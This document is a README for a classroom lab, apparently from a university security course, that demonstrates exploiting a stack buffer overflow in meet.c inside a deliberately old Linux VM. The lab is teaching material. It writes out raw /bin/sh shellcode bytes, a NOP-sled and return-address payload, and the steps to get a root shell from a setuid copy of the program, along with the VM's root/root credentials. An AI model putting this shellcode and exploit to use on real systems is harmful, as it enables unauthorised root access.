Prequisites

These in-class demonstrations are designed to work inside a virtual machine running (an ancient) version of Linux. We provide basic VM images for either Oracle VirtualBox or vmware. CSL Linux machines all have VirtualBox pre-installed.

Download Oracle's Virtual Box: https://www.virtualbox.org/wiki/Downloads
Download vmware: https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0

VM images

VirtualBox

vmware

Image: http://pages.cs.wisc.edu/~ace/assets/vmware-boxes-2.1.tar.bz2

Tips for these VM images

The user account username/password: user/user
The root account username/password: root/root

SSH access

Sometimes accessing the VM via SSH is easier (copy-paste may work better, and you can transfer files both way using the scp command). Startup the VM, login as user or root, find the local IP address using the command:

 /sbin/ifconfig

Find the inet address assigned to this VM.

inet addr:172.16.250.140

Connect via SSH:

ssh [email protected]

Copy files TO the VM:

scp demo/* [email protected]:~/

Copy files FROM the VM:

scp [email protected]:~/* demo/

Resources

This meet.c exploit demo is taken form Chapter 11 of the Ethicial Hacker's Handbook (http://www.pdf-archive.com/2011/02/23/gray-hat-hacking/gray-hat-hacking.pdf). See this document if you get stuck and need more information.

Test and crash meet

Build our source

On the VM, after you've copied these source files, compile the source code.

gcc -o meet meet.c
gcc -o get_sp get_sp.c

Test and break meet

./meet Ace H@x0r
perl -e 'print "A"x200'
echo $(perl -e 'print "A"x200')
./meet Ace $(perl -e 'print "A"x200')
./meet Ace $(perl -e 'print "A"x500')

Control-flow hijack for meet.c

Setup setuid super-meet

Make a copy of meet and mark setuid (remember root password is root).

su root
cp meet super-meet
chown root:root super-meet
chmod u+s super-meet
exit

Generate shellcode

Be careful copy-pasting this command. Copy-pasting might introduce unintended line break characters.

perl -e 'print 
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > shellcode

Check the length: shellcode should be 53. If not, something is wrong. Maybe you accidentally added an unintended line break or some other character.

wc -c shellcode

Get the stack pointer

./get_sp

Check it twice! It shouldn't change.

./get_sp

Compute an approximate landing spot: ESP - 0x300

(In the lines below, substitute your own ESP values.)

Stack pointer (ESP): 0xbffff672 - 0x300 = 0xbffff372

Convert to little-endian: 0x72 0xf3 0xff 0xbf Use perl to print these 38 times

perl -e 'print"\x72\xf3\xff\xbf"x38' > sp-repeat

Running the exploit

Run the exploit. Keep changing the size of the nop sled until you align the exploit properly on the stack. Try 200, 201, 202, ....

./meet ace $(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)

Check super-meet, should be marked setuid

ls -l

Check your id, should be user(1000)

id

Run the exploit against super-meet. If you get a shell, check your uid using id.

./super-meet ace "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"

Test integer overflow vulnerability

gcc -o width width.c
./width 5 "Hello there"
./width 85 "Hello there:
./width 65536 "Hello there"

Issues

If you find any problems with this demo: send me an email, file an issue, or better yet, just send me a pull request.

katamaritaco / vulnerability-demo Goto Github PK

vulnerability-demo's Introduction